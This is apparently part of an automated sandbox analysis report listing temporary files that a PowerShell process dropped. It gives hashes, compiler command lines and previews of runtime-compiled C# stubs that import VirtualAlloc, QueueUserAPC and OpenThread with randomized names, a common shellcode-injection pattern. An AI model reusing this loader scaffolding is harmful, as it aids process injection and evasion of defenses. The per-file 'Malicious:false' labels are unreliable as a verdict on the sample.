              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwgoeqp4.lue.ps1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wuzmjj4s.5no.psm1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhaj02ra.0xw.psm1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1

              C:\Users\user\AppData\Local\Temp\oeprcmty.0.cs

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):408
              Entropy (8bit):5.01293234302818
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy
              MD5:35EAB9A45B1CC09A0099A179AD3DCFE5
              SHA1:42939AC7047BC372300FDD21624100E5C9F83B7F
              SHA-256:EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
              SHA-512:03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class sbjqhhwtq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint cfuaonbeh,uint oaxrtopxx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr ckpaa,uint gmprdfblmj,uint nuadeidgng,uint pxgmfdeh);.. }..}.

              C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.204272802797053
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23ftzxs7+AEszIWXp+N23fO9:p37Lvkmb6KH1WZE8w
              MD5:DDCBEEB82FF764447619CA8F26B79AB0
              SHA1:A052431B053ADEAD13B9423EDD80F4FA10449761
              SHA-256:B19AC579456301299E428F81373E8CDEC9B472B46DAB3181DA7036EAFDF344F9
              SHA-512:C45C889F7F9F9A0C13A506A10D9366C986054449F0BF4106E67C6306C1935A91F538672C177A2939A39097DFCC0D2B62225895EAD3D32305932EC613B3A6758C
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oeprcmty.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oeprcmty.0.cs"

              C:\Users\user\AppData\Local\Temp\oeprcmty.dll

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.6167731029789754
              Encrypted:false
              SSDEEP:48:69XE7S5FwYXok+xW8JrwZX1ulaIta31Iuq:b7S5ekPte8gK1
              MD5:42FA89466D0BA4E5CE5F3B7D1CE657EF
              SHA1:CF74956879EA24FD0E5E7B83DB67076BC4DB1130
              SHA-256:47B05AD37FFC382C93C1A317459F63F21FF3350792C3A75B41F55302C8B095F9
              SHA-512:43EDD9ACD9592AF0E1CFAA03B912B9396BBEB379F8FEE6036A570B5B8825929A579DAA47666769B7150628B8B511F46483DB337651DB9975D8A6B0FDDEFB3BF2
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................5.................(.......................!.............. <............ N............ V.....P ......c.........i.....s.....}.....................c. ...c...!.c.%...c.......*.....3.;.....<.......N.......V...........

              C:\Users\user\AppData\Local\Temp\oeprcmty.out

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.303367578429046
              Encrypted:false
              SSDEEP:12:xKIR37Lvkmb6KH1WZE8lKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHaE8lKaM5DqBVKVrdFAMBJTH
              MD5:ACC5E905D76EBE06CB3C38D09CB263C1
              SHA1:EEB3AF5D92BA9D427C85C67331B958E0063B4510
              SHA-256:E991673849F98E5A44BA73A54CA47A1C3702F5BC55468B4CEDFE8A294829C473
              SHA-512:09151FBB71982E91F91C4CF2C29057F5719235AC38853B94F48593C3C05B5708BAFB94290FBA65F256668BEB9BB1B6F1DB7EB0EA6B2886A956E3C8ACA5CAFBD1
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oeprcmty.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oeprcmty.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

              C:\Users\user\AppData\Local\Temp\oyq1c2cj.0.cs

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):404
              Entropy (8bit):5.019892496194437
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy
              MD5:04CA9F3DD2F71BC69A66232592BD29B7
              SHA1:12724CB97FE30A8B84901648B3653B9AC8FB2F73
              SHA-256:DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
              SHA-512:383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mdmvexpd. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr uqmdvtabd,IntPtr kdclqxwfug,IntPtr vtnts);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint cxsij,uint lhaikp,IntPtr xwl);.. }..}.

              C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.302656177771041
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fRGWzGzxs7+AEszIWXp+N23fRGWzb:p37Lvkmb6KHpGWZE8pb
              MD5:CBF10C1AA567D2B82E5C422E0E544DBC
              SHA1:C6E081F904BEC73A1335B50C820B8FC00B26142C
              SHA-256:5024F757714C7A4D6EC2DBADB6F5636ABAC0969348C2865AF68CD70538C94EAF
              SHA-512:519ACB5318CA598DA74DE737FA0F97C85A1EA1BB3883C064DD5EC9DE083C8802720E17712F03AFDA3091B670C73A10CE95388F644E69EA991718405ECCF11E8D
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oyq1c2cj.0.cs"

              C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.627023820532716
              Encrypted:false
              SSDEEP:24:etGS/8OmU0t3lm85nt4tdalqQg6AyS41lI+tkZfUBFyVUWI+ycuZhN4rakSBEPNq:6dXQ3r5eXa1OxJUPy31ulaa3Oq
              MD5:FE9CF2A1075CDE78F99497A0ABFD05F1
              SHA1:E2344F061295060CC6811ECB494E2E28087A9FEF
              SHA-256:E4D23FD1D1461CF5C63B24A22D23022117A15B0B7B67245FE3D62BA7B6E0E5B3
              SHA-512:57C8A774CB7815770F9DD1432C92C9F3AC9187E44CA1EBF20CAE98E9065365F475362296561576ADBB330356B1CA0E3BEA198E84F9DE4BD2836502151E79B4BD
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-....................................... .............. ;............ H............ [.....P ......f.........l.....v...........................f. ...f...!.f.%...f.......*.....3.1.....;.......H.......[...........

              C:\Users\user\AppData\Local\Temp\oyq1c2cj.out

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.348978461572798
              Encrypted:false
              SSDEEP:12:xKIR37Lvkmb6KHpGWZE8paKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHNE88KaM5DqBVKVrdFAMBJTH
              MD5:877DECC09667FEEF592E3D12599D6BE6
              SHA1:38E9B510CEDFD51647B8E60E108ABD9D5B88A872
              SHA-256:D4C965D7B55B61D2E9C2DA9832B765CB6DAB82C25161840C8BC40B1021182DD3
              SHA-512:E789EE736C5D700F327695C04DBDCD55CDFA5DCD66CFDF6721AECA281019C3B9BC79203128CDCECF8B7ACD1806F395E22D18E4ACE0C510D33ABAFC8E5B2DABA6
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oyq1c2cj.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

              C:\Users\user\AppData\Local\Temp\pqvogmwc.0.cs

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):408
              Entropy (8bit):5.01293234302818
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy
              MD5:35EAB9A45B1CC09A0099A179AD3DCFE5
              SHA1:42939AC7047BC372300FDD21624100E5C9F83B7F
              SHA-256:EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
              SHA-512:03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class sbjqhhwtq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint cfuaonbeh,uint oaxrtopxx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr ckpaa,uint gmprdfblmj,uint nuadeidgng,uint pxgmfdeh);.. }..}.

              C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.268763390388562
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fb0zxs7+AEszIWXp+N23fVH:p37Lvkmb6KHoWZE89H
              MD5:0AED35FFAB0A5CA771393CEE60A13F73
              SHA1:979C1895FA3CBA52E97A565456E3CB7BC5F2881C
              SHA-256:BBC0244212BE2929C78131DC34E9FD9A02073ACC1E8E168234983639565942B1
              SHA-512:E404EE19D23A043A1F920E8EFA6ACDB3BED35DA1FB4F04FAE4671CB09DA372ED730475AD757C02495A440796EA36CCB520CE92DC4E509CD235FCEFD326FBF7E5
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pqvogmwc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pqvogmwc.0.cs"

              C:\Users\user\AppData\Local\Temp\pqvogmwc.dll

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.6261368502649796
              Encrypted:false
              SSDEEP:48:6foXE7S5FwYXok+fOW8J4bZX1ulia3Gq:4z7S5ekE7ZeUK
              MD5:ABDFB9F235DA3F5765DF16A0F4C505C5
              SHA1:5AC9B90DB8481105FE57EF9D8034C8107BBCD4FB
              SHA-256:6E6742E39EB933CD0FFB0FB7A180BD24CFFD36A3DBF4DEE8860C701374EE2C65
              SHA-512:A1B1BCF89FF334AD8FC7D71AF2E89D58725323CE7CFE78C79D594FE7A0CF74F79309EB43A2BEB15E34BE19999595394B3A9C6F74746994A09B144518A1D7B17B
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................5.................(.......................!.............. <............ N............ V.....P ......c.........i.....s.....}.....................c. ...c...!.c.%...c.......*.....3.;.....<.......N.......V...........

              C:\Users\user\AppData\Local\Temp\pqvogmwc.out

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.327041989163472
              Encrypted:false
              SSDEEP:12:xKIR37Lvkmb6KHoWZE89OKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KH5E8AKaM5DqBVKVrdFAMBJTH
              MD5:F180A3304C942DDE94B3BAC538ECB758
              SHA1:6E79051C6651F1BD7FFD6FACFCD2593FADA77211
              SHA-256:6F3C8189552C2FD69069D7310004463AA064222D955826CE28204DFC65B676B8
              SHA-512:3E15E72859E72FF31C2BAF5CE595307A5B541286CE3F49EE6733CB29DDF4753D25DAB1DC80D1F5DB983FCB39B730687F79DBFE9A6308EE4E3E0BE717295608C4
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pqvogmwc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pqvogmwc.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

              C:\Users\user\AppData\Local\Temp\pwlcj2cu.0.cs

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):408
              Entropy (8bit):5.01293234302818
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy
              MD5:35EAB9A45B1CC09A0099A179AD3DCFE5
              SHA1:42939AC7047BC372300FDD21624100E5C9F83B7F
              SHA-256:EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
              SHA-512:03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class sbjqhhwtq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint cfuaonbeh,uint oaxrtopxx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr ckpaa,uint gmprdfblmj,uint nuadeidgng,uint pxgmfdeh);.. }..}.

              C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.278277088352822
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23faW+zxs7+AEszIWXp+N23faMn:p37Lvkmb6KHf+WZE87n
              MD5:5790AEB5F74FB21A80B408FD12A92956
              SHA1:24CD53B4B919829C1B8759DE70332D6C33833B08
              SHA-256:AB497F850922DCAA447D61C6DB10B7C506185F853C4A83B57AB6F64FB3AFF3C3
              SHA-512:DECC8E44B896BC7939FD86BCB4FDA8A8C33D04C24F3A50AA226EB305A7720D71B0205E0711C92CC54C63995D5CC907EB6B56F8C2D91FA66747687854F824C0D2
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pwlcj2cu.0.cs"

              C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.629201724166271
              Encrypted:false
              SSDEEP:24:etGSt8+mUE7R85FwYH3okOp3fOdWOjU9tkZfpMGqZ0WI+ycuZhNaakSCPNnq:6jXE7S5FwYXok+wW8JqXZX1ulaa3Oq
              MD5:5B6BFEE2D96A3F071B7CDB664124FA24
              SHA1:9CC97AF3855302E9AF7A5CB867C25E63E125777C
              SHA-256:A955C358D2C8C39435A3C5F58EAA07D1E33CFDA61C4FC0A861F2EA2579B7EA9C
              SHA-512:0DC30DCC0F81EFFBBC7C25B0E74DCC040E9E162B293AD12C7E5209CF71A2352094E2DAC942A45F9B391D2B43F6AC91F6D34E8AA2B0E0F2E23AABF1EF5112B88E
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................5.................(.......................!.............. <............ N............ V.....P ......c.........i.....s.....}.....................c. ...c...!.c.%...c.......*.....3.;.....<.......N.......V...........

              C:\Users\user\AppData\Local\Temp\pwlcj2cu.out

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.334266323622075
              Encrypted:false
              SSDEEP:12:xKIR37Lvkmb6KHf+WZE87uKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KH3E86KaM5DqBVKVrdFAMBJTH
              MD5:693350EB45B076BEF7BADC2A56D51D9A
              SHA1:166691AB2DB7AD9CC5D4EEA53978B3449EA2CD1F
              SHA-256:AA4A99224C20E8013A706290E2E528CEAC862D6831BB55505FCBBBEB269D56A8
              SHA-512:0D465EADD34EB3D465CAFAC084DA43F54B7DAE86A7B5236E7BB032689F9C7F8C9AD6D98D7F95A4279D7F47D41E385EB8EAE99753D0646FAF77031BD0BDFCEA4D
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pwlcj2cu.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

              C:\Users\user\AppData\Local\Temp\sjfy431f.0.cs

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):404
              Entropy (8bit):5.019892496194437
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy
              MD5:04CA9F3DD2F71BC69A66232592BD29B7
              SHA1:12724CB97FE30A8B84901648B3653B9AC8FB2F73
              SHA-256:DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
              SHA-512:383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mdmvexpd. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr uqmdvtabd,IntPtr kdclqxwfug,IntPtr vtnts);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint cxsij,uint lhaikp,IntPtr xwl);.. }..}.

              C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.277721811228957
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fRP1HUzxs7+AEszIWXp+N23fRPdxn:p37Lvkmb6KHfUWZE8Z
              MD5:0A524C50986168EBADFA5220C99D85B5
              SHA1:957C8AE7E56ED3E31C52C620CA58A536AF663B1E
              SHA-256:6A81B937A0148A536367B397563C15616B7CFCC944B0AD7301E5C772877ED3C8
              SHA-512:2AC9AB5498FCD94B6CD22DE78EBEE49487F729DDAF467B68A4070BD22725B02F58C2C6571783BE8175591F22227FAACE82B57B882E9059E0D103B8E9A3553E54
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sjfy431f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sjfy431f.0.cs"

              C:\Users\user\AppData\Local\Temp\sjfy431f.dll

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.624456178337711
              Encrypted:false
              SSDEEP:24:etGSF8OmU0t3lm85nt4tdalqQg6AxoS41lI+tkZfAB8WVUWI+ycuZhNSakSaPNnq:6rXQ3r5eXa1mLxJAuG31ulSa3Wq
              MD5:177880A67897413DB394031830AD03DC
              SHA1:3603A0870B5664FA8883FBEB92CE3C1FD692630B
              SHA-256:DB91BB6E6CE210D265DF94791A01837D9D946BA57CCE88807AF9F949BCC77948
              SHA-512:D521BDBAC1A2575C6B5CFBE8D48B4991C37A2FBE5295F6187E906C5264747D0949331D4F1DC71D1C62FA5F78AD4CB58C71D62240A3A6B4CE8394376AF308EA15
              Malicious:false
              Reputation:unknown
